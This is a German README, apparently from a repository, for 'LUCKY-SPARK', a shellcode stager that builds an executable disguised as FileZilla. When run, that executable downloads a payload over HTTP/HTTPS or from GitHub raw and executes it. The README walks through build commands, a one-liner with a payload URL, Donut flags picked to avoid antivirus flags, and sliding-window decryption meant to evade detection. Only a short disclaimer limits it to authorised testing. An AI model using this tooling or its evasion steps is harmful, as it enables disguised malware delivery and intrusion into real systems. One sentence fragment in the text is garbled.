
Ein heimlicher Stager, der für Shellcode-Payloads konzipiert ist, die mit http/https wie Sliver oder auf GitHub Raw bereitgestellt werden.
⟪ LUCKY-SPARK ⟫ ist ein Stager, der für Shellcode-Payloads entwickelt wurde, die über http/https wie Sliver oder auf GitHub Raw bereitgestellt werden. Er verwendet moderne Verschleierungs- und Umgehungsmethoden wie die Just-in-Time-Entschlüsselung des Payloads mittels gleitendem Fenster sowie CPU-Instruktions-Patching. Standardmäßig erstellt er eine ausführbare Datei, die als FileZilla-FTP-Client getarnt ist.
pmulqd versteckt und werden nach der Ausführung gepatcht.Klonen Sie das Repository oder laden Sie es herunter und stellen Sie sicher, dass make und mingw auf Ihrem System installiert sind.
git clone <repository_url>
cd LUCKY-SPARK
Führen Sie das Skript zur Erstellung der Binärdatei aus.
./luckySpark.sh
Sie werden aufgefordert, die URL zu Ihrem gestaffelten Payload sowie optional einen User-Agent einzugeben.

Kann in einer Zeile ausgeführt werden, um in Skripte eingebunden zu werden:
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

Wenn Sie Donut oder Sliver (das Donut verwendet) einsetzen, empfehle ich diese Flags zur Erstellung des Payloads:
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
Dies vermeidet auffälliges und geflaggtes Verhalten von Donut. Insbesondere die Umgehung von Donut wird ironischerweise stark geflaggt.
Dadurch wird eine Binärdatei filezilla.exe erstellt, die beim Ausführen den Payload abruft und ausführt.
Dieser Stager wurde für die Verwendung mit Sliver entwickelt. Stagen Sie einen Sliver-Payload wie hier beschrieben: Sliver Staging Verschlüsseln Sie den Payload nicht.
Aber jede auf http/https basierende Staging-Methode funktioniert.
wie python3 -m http.server
oder ein Payload, der in einem öffentlichen Repository auf github.com hochgeladen wurde.
Dieser Stager unterstützt NICHT das Meterpreter-Staging-Protokoll.
Schritt 1: RIP erreicht Seite 0 und Seite 0 wird entschlüsselt
Seiten: [ D | E | E | ... ]
RIP -> ^
Schritt 2: RIP erreicht Seite 1 und Seite 1 wird entschlüsselt
Seiten: [ D | D | E | ... ]
RIP -> ^
Schritt 3: RIP erreicht Seite 2 und Seite 2 wird entschlüsselt. Seite 0 wird verschlüsselt
Seiten: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK ist nur für Bildungszwecke, Forschung und autorisierte Penetrationstests bestimmt. Die unbefugte Verwendung gegen Systeme ohne Erlaubnis ist illegal und unethisch.